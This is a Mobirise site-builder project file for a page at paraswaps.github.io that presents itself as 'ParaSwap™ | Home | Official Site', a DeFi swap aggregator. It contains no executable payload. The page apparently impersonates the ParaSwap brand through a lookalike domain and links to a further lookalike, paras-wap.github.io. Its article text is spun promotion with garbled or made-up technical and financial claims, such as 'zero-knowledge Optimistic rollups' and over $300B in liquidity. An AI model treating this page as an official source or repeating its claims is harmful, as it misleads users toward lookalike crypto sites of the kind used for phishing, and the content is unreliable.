{
  "settings": {
    "name": "paraswaps",
    "currentPage": "index.html",
    "theme": {
      "name": "startm5",
      "title": "StartM5",
      "titlePreset": "StartM5",
      "styling": {
        "primaryColor": "#9fe870",
        "secondaryColor": "#ffd7ef",
        "successColor": "#3a341c",
        "infoColor": "#320707",
        "warningColor": "#a0e2e1",
        "dangerColor": "#ffea64",
        "mainFont": "Inter Tight",
        "display1Font": "Inter Tight",
        "display1Size": 5,
        "display2Font": "Inter Tight",
        "display2Size": 4,
        "display5Font": "Inter Tight",
        "display5Size": 2.5,
        "display7Font": "Inter Tight",
        "display7Size": 1.4,
        "display4Font": "Inter Tight",
        "display4Size": 1.2,
        "isRoundedImages": true,
        "isRoundedButtons": true,
        "isLargeButtons": true,
        "isGhostButtonBorder": true,
        "underlinedLinks": false,
        "isAnimatedOnScroll": false,
        "isScrollToTopButton": false
      }
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "5.9.0",
    "siteFonts": [
      {
        "css": "'Inter Tight', sans-serif",
        "name": "Inter Tight",
        "url": "https://fonts.googleapis.com/css?family=Inter+Tight:100,200,300,400,500,600,700,800,900,100i,200i,300i,400i,500i,600i,700i,800i,900i"
      }
    ],
    "favicon": "@PROJECT_PATH@/assets/images/paraswap.webp",
    "robotsSwitcher": true,
    "robotsText": "User-agent: *\nDisallow: /cgi-bin\nSitemap: https://paraswaps.github.io/sitemap.xml\n",
    "sitemapSwitcher": true,
    "siteUrl": "https://paraswaps.github.io/",
    "sitemapSwitcherAuto": "on",
    "imageResize": true,
    "usedWebp": true,
    "mbrsiteDomain": "1j0tfqhmph",
    "cookiesAlert": false,
    "gdpr": false,
    "uniqCompNum": 2,
    "versionPublish": "5.9.0"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "ParaSwap™ | Home | Official Site",
        "meta_descr": "ParaSwap is a protocol that unites the liquidity of decentralized exchanges and lending protocols into one interface and API, offering secure, intelligent and optimized trading …",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "alias": false,
          "_styles": {
            "background-color": "@bgColor",
            "padding-top": "(@paddingTop * 15px)",
            "padding-bottom": "(@paddingBottom * 15px)",
            "img": {
              "object-fit": "contain",
              "border-radius": "0 !important"
            }
          },
          "_name": "image04",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"image4\" group=\"Images & Videos\">\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Caption\" name=\"showText\">\n        <header>Background</header>\n        <input type=\"color\" title=\"Color\" name=\"bgColor\" value=\"#ffffff\">\n    </mbr-parameters>\n\n    <div class=\"image-block m-auto\">\n        <img src=\"@PROJECT_PATH@/assets/images/107230869-1682446793111-flat-cryptoquiz-v1-1.jpeg\" alt=\"Para Swap\">\n        <div mbr-if=\"showText\">\n            <p class=\"mbr-text mt-4 align-center mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".mbr-text\">\n                Unlock your true path!\n            </p>\n        </div>\n    </div>\n</section>",
          "_cid": "tXsKqGDtac",
          "_anchor": "image04-0",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        },
        {
          "alias": false,
          "_styles": {
            "& when not (@fullScreen)": {
              "padding-top": "(@paddingTop * 1rem)",
              "padding-bottom": "(@paddingBottom * 1rem)"
            },
            "& when (@bg-type = \"color\")": {
              "background-color": "@bg-value"
            },
            "& when (@bg-type = \"image\")": {
              "background-image": "url(@bg-value)"
            },
            ".mbr-fallback-image.disabled": {
              "display": "none"
            },
            ".mbr-fallback-image": {
              "display": "block",
              "background-size": "cover",
              "background-position": "center center",
              "width": "100%",
              "height": "100%",
              "position": "absolute",
              "top": "0",
              "& when (@bg-type = 'video')": {
                "background-image": "url(@fallBackImage)"
              }
            },
            ".card-wrapper": {
              "background": "@wrapBgColor",
              "@media (max-width: 767px)": {
                "padding": "1.5rem"
              },
              "@media (min-width: 768px)": {
                "padding": "2.25rem"
              }
            },
            ".mbr-text, .mbr-section-btn": {
              "color": "#000000",
              "text-align": "left"
            },
            ".card-title, .card-box": {
              "text-align": "left",
              "color": "#000000"
            }
          },
          "_name": "article07",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"article07\" group=\"Article\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" mbr-class=\"{\n    'mbr-fullscreen': fullScreen,\n    'mbr-parallax-background': bg.parallax}\">\n  <mbr-parameters>\n    <header>Size</header>\n    <input type=\"checkbox\" title=\"Full Screen\" name=\"fullScreen\" checked>\n    <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\" checked>\n    <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"0\">\n    <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"0\">\n    <input type=\"range\" inline title=\"Content Width\" name=\"contentWidth\" min=\"8\" max=\"12\" step=\"1\" value=\"12\">\n    <header>Show/Hide</header>\n    <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n    <input type=\"checkbox\" title=\"Subtitle\" name=\"showSubtitle\" checked>\n    <input type=\"checkbox\" title=\"Text\" name=\"showText\" checked>\n    <input type=\"checkbox\" title=\"Buttons\" name=\"showButtons\">\n    <input type=\"color\" title=\"Wrap Bg\" name=\"wrapBgColor\" value=\"#ffffff\">\n    <header>Background</header>\n    <fieldset type=\"background\" name=\"bg\" parallax>\n      <input type=\"image\" title=\"Image\" value=\"../_images/background1.jpg\" parallax>\n      <input type=\"color\" title=\"Color\" value=\"#edefeb\" selected>\n      <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n    </fieldset>\n    <header condition=\"bg.type === 'video'\">Fallback Image</header>\n    <input type=\"image\" title=\"Fallback Image\" value=\"../_images/background1.jpg\" name=\"fallBackImage\" condition=\"bg.type === 'video'\">\n    <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n    <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n    <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.3\" condition=\"overlay && bg.type !== 'color'\">\n  </mbr-parameters>\n\n  <div class=\"mbr-fallback-image disabled\" mbr-if=\"bg.type == 'video'\"></div>\n  <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type!== 'color'\" mbr-style=\"{'opacity': overlayOpacity, 'background-color': overlayColor}\"></div>\n  <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n    <div class=\"row justify-content-center\">\n      <div class=\"card col-md-12 col-lg-{{contentWidth}}\">\n        <div class=\"card-wrapper\">\n          <h3 class=\"card-title mbr-fonts-style mbr-white mt-3 mb-4\" mbr-theme-style=\"display-2\" mbr-if=\"showTitle\" data-app-selector=\".card-title, .card-box\"><b>ParaSwap™ | Home Official Site</b></h3>\n          <div class=\"row card-box align-left\">\n            <div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>The Rise of Paraswap: Unlocking Cross-Chain Liquidity for DeFi Users</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">Since the advent of decentralized exchanges (DEXes) in 2017, their user experiences have progressed tremendously - from rudimentary interfaces to sophisticated trading tools now common across prominent DEX aggregators like 1inch Network. However, one core limitation remained - the siloed nature of individual DEXes due to technical barriers between blockchains.\n<br>\n<br>This fractured liquidity hampered meaningful DeFi participation, frustrating traders with empty pools across multiple networks. Enter Paraswap, whose vision of enabling unified cross-chain swapping removed this bottleneck - supercharging access to exponential liquidity that has since developed DeFi quantitatively.</p>\n              </div>\n            </div>\n            <div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Bridging Fragmented Liquidity Pools</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">Paraswap’s founding team observed over $70B spread inefficiently across Uniswap, Sushiswap andBalancer on Ethereum alone in late 2019. Elsewhere, fragmentation abounded - with users hopping tediously between Polygon QuickSwap, BSC PancakeSwap and myriad others to piecemeal orders.\n<br>\n<br>Leveraging existing infrastructure like zero-knowledge Optimistic rollups, Polygon bridges and WETH/renBTC standards, Paraswap developed a unified automation layer powering seamless cross-DEX routing. Drawing the best routes across compatible blockchains in a single transaction, complex swaps became accessible to all.</p>\n              </div>\n            </div>\n            <div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Revolutionizing the DeFi Experience</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">Mainnet launch in early 2020 proved timely amid explosive DeFi growth. Adopted swiftly by DEX aggregators, Paraswap quietly democratized the liquidity previously gated to whales. Now, traders could swap microcaps easily through recursive routing across Ethereum mainnet and sidechains.\n<br>\n<br>Its non-custodial model safeguards funds, and fee sharing with partner protocols further unlocked network effects. Soon, many major DeFi applications integrated Paraswap for unified token swaps - onboarding millions through elegant, optimized flows imperceptibly spanning infrastructure borders previously requiring tech expertise.</p>\n              </div>\n            </div>\n            <div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Benefitting Protocols Through Metagovernance</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\"><b><a href=\"https://paras-wap.github.io/\" class=\"text-primary\">Paraswap</a></b> also reshaped dynamics amongst competing DEXes and ecosystems. By seamlessly bridging between them transparently, it disincentivized territorial battles in favor of collaborative standardization benefitting users universally.\n<br>\n<br>Projects supporting Paraswap routing reap synergistic exposure whilst maximizing capture of liquidity “leakage” from direct competitor pools. Its success incentivizes lowering silo walls qualitatively versus extractive tactics like paid listings or liquidity share grabs that fragment communities.</p>\n              </div>\n            </div><div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Overcoming Technical Debt with Paraswap 2.0</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">While revolutionizing cross-chain UX, rapid proliferation surfaced technical debt from Paraswap’s modular origins. Version 2 drastically overhauled the backend, focusing on:\n<br>\n<br>Upgraded DEX APIs for sustainable expansion to emerging networks like Klaytn and Harmony\n<br>“Cross-compatibility” between core EVM chains and alternatives like Solana removing support burden\n<br>Reduced runtime complexity through signature optimizations for lower gas costs\n<br>Advanced multicurrency transaction batching for atomic settlement across chains\n<br>\n<br>The rearchitecture established Paraswap as the clear interoperability layer powering global onchain liquidity under a common standard - without trust or centralized custody. Its future remains bright.</p>\n              </div>\n            </div><div class=\"item features-without-image col-12\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Sustaining the Paradigm Shift</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">Today, <a href=\"https://www.paraswap.io/\" class=\"text-primary\"><b>Paraswap</b></a> unlocks over $300B combined liquidity across 30+ DEXs/protocols, redefining what’s possible through seamless DeFi participation regardless of blockchain silos or individual wallet balances.\n<br>\n<br>Its collaborative, open-source spirit sustained qualitative growth - welcoming new partners cooperatively versus extractively. Emerging economies like DFK gain instant global scale through adoption of Paraswap’s infrastructure-agnostic standards.\n<br>\n<br>Ultimately, Paraswap exemplifies Web3’s promises - removing walls via inclusive, permissionless innovation serving all ecosystems rather than isolated success alone. Its journey transformed the DeFi landscape through a singular focus on empowering users above all else.</p>\n              </div>\n            </div>\n          </div>\n          <div mbr-buttons mbr-theme-style=\"display-7\" class=\"mbr-section-btn\" mbr-if=\"showButtons\" data-toolbar=\"-mbrBtnMove\">\n            <a class=\"btn btn-primary\" href=\"https://mobiri.se\" data-app-placeholder=\"Type Text\">Start Now</a>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</section>",
          "_cid": "tXsKs1Kt4c",
          "_anchor": "article07-1",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        }
      ]
    }
  }
}